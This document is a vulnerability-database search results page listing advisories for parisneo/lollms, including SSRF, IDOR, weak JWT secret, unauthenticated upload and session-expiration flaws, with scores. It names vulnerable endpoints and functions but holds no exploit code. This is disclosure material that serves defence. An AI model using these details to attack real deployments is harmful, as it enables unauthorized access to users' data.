Lucene search
K

568 matches found

Cvelist
Cvelist
added 2026/04/08 2:20 a.m.21 views

CVE-2026-1163 Insufficient Session Expiration in parisneo/lollms

An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject reques...

4.1CVSS0.0021EPSS
Exploits0References1
EUVD
EUVD
added 2026/04/08 2:20 a.m.6 views

EUVD-2026-20030

An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject reques...

4.1CVSS5.9AI score0.0021EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2026/04/08 2:20 a.m.4 views

CVE-2026-1163 Insufficient Session Expiration in parisneo/lollms

An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject reques...

4.1CVSS5.9AI score0.0021EPSS
Exploits0References1
CVE
CVE
added 2026/04/08 2:20 a.m.10 views

CVE-2026-1163

CVE-2026-1163 describes an insufficient session expiration in the latest version of parisneo/lollms, where active sessions are not invalidated after a password reset due to missing logic to reject idle requests and a default 31-day session duration. This enables a compromised account to retain ac...

4.1CVSS5.9AI score0.0021EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2026/04/08 12:0 a.m.6 views

PT-2026-31070

An insufficient session expiration vulnerability exists in the latest version of parisneo/lollms. The application fails to invalidate active sessions after a password reset, allowing an attacker to continue using an old session token. This issue arises due to the absence of logic to reject reques...

4.1CVSS5.9AI score0.0021EPSS
Exploits0References2
CNNVD
CNNVD
added 2026/04/08 12:0 a.m.7 views

LoLLMs 代码问题漏洞

LoLLMs is a large language and multimodal system personally developed by Saifeddine ALOUI. LoLLMs has code vulnerabilities; these vulnerabilities stem from an insufficient conversation expiration mechanism after password reset, which may allow attackers to maintain persistent access to compromise...

4.1CVSS5.9AI score0.0021EPSS
Exploits0References1
NVD
NVD
added 2026/04/07 7:16 a.m.7 views

CVE-2026-1114

In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens JWT. This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the...

9.8CVSS0.0054EPSS
Exploits1References2
Cvelist
Cvelist
added 2026/04/07 6:19 a.m.26 views

CVE-2026-1114 Improper Access Control via Weak JWT Token in parisneo/lollms

In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens JWT. This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the...

9.8CVSS0.0054EPSS
Exploits1References2
ATTACKERKB
ATTACKERKB
added 2026/04/07 6:19 a.m.4 views

CVE-2026-1114

In parisneo/lollms version 2.1.0, the application's session management is vulnerable to improper access control due to the use of a weak secret key for signing JSON Web Tokens JWT. This vulnerability allows an attacker to perform an offline brute-force attack to recover the secret key. Once the...

9.8CVSS7.2AI score0.0054EPSS
Exploits1References3
CNNVD
CNNVD
added 2026/04/07 12:0 a.m.10 views

LoLLMs 安全漏洞

LoLLMs is a large language and multimodal system personally developed by Saifeddine ALOUI. Version 2.1.0 of LoLLMs contains a security vulnerability. This vulnerability arises from the use of weak keys for signing JSON Web Tokens, leading to improper access control. This could allow attackers to...

9.8CVSS7.3AI score0.0054EPSS
Exploits1References2
Packet Storm
Packet Storm
added 2026/03/31 12:0 a.m.142 views

📄 lollms-webui Server-Side Request Forgery

A critical server-side request forgery vulnerability has been identified in lollms-webui, the web interface for Lord of Large Language and Multi modal Systems. The @router.post"/api/proxy" endpoint allows unauthenticated attackers to force the server into making arbitrary GET requests. This can b...

9.1CVSS5.8AI score0.21629EPSS
Exploits3
RedhatCVE
RedhatCVE
added 2026/03/30 10:52 p.m.3 views

CVE-2026-0560

A Server-Side Request Forgery SSRF vulnerability exists in parisneo/lollms versions prior to 2.2.0, specifically in the /api/files/export-content endpoint. The downloadimagetotemp function in backend/routers/files.py fails to validate user-controlled URLs, allowing attackers to make arbitrary HTT...

7.5CVSS7.4AI score0.01765EPSS
Exploits1References1
RedhatCVE
RedhatCVE
added 2026/03/30 10:52 p.m.3 views

CVE-2026-0562

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respondrequest function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

8.3CVSS7AI score0.00268EPSS
Exploits1References1
RedhatCVE
RedhatCVE
added 2026/03/30 10:52 p.m.5 views

CVE-2026-0558

A vulnerability in parisneo/lollms, up to and including version 2.2.0, allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. This endpoint does not enforce authentication, unlike other file-related endpoints, and lacks the Dependsgetcurrentactiveus...

9.8CVSS7AI score0.0043EPSS
Exploits1References1
EUVD
EUVD
added 2026/03/29 6:30 p.m.4 views

EUVD-2026-17039

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respondrequest function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

8.3CVSS7AI score0.00268EPSS
Exploits1References3
EUVD
EUVD
added 2026/03/29 6:30 p.m.5 views

EUVD-2026-17037

A Server-Side Request Forgery SSRF vulnerability exists in parisneo/lollms versions prior to 2.2.0, specifically in the /api/files/export-content endpoint. The downloadimagetotemp function in backend/routers/files.py fails to validate user-controlled URLs, allowing attackers to make arbitrary HTT...

7.5CVSS7.4AI score0.01765EPSS
Exploits1References3
EUVD
EUVD
added 2026/03/29 6:30 p.m.8 views

EUVD-2026-17035

A vulnerability in parisneo/lollms, up to and including version 2.2.0, allows unauthenticated users to upload and process files through the /api/files/extract-text endpoint. This endpoint does not enforce authentication, unlike other file-related endpoints, and lacks the Dependsgetcurrentactiveus...

7.5CVSS7AI score0.0043EPSS
Exploits1References3
NVD
NVD
added 2026/03/29 6:16 p.m.3 views

CVE-2026-0562

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respondrequest function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

8.3CVSS0.00268EPSS
Exploits1References3
PyPA
PyPA
added 2026/03/29 6:16 p.m.7 views

PYSEC-2026-204

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respondrequest function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

8.3CVSS7.3AI score0.00268EPSS
Exploits1References3Affected Software1
PyPA
PyPA
added 2026/03/29 6:16 p.m.6 views

PYSEC-0000-CVE-2026-0562

A critical security vulnerability in parisneo/lollms versions up to 2.2.0 allows any authenticated user to accept or reject friend requests belonging to other users. The respondrequest function in backend/routers/friends.py does not implement proper authorization checks, enabling Insecure Direct...

8.3CVSS7.3AI score0.00268EPSS
Exploits1References3Affected Software1
Rows per page
Query Builder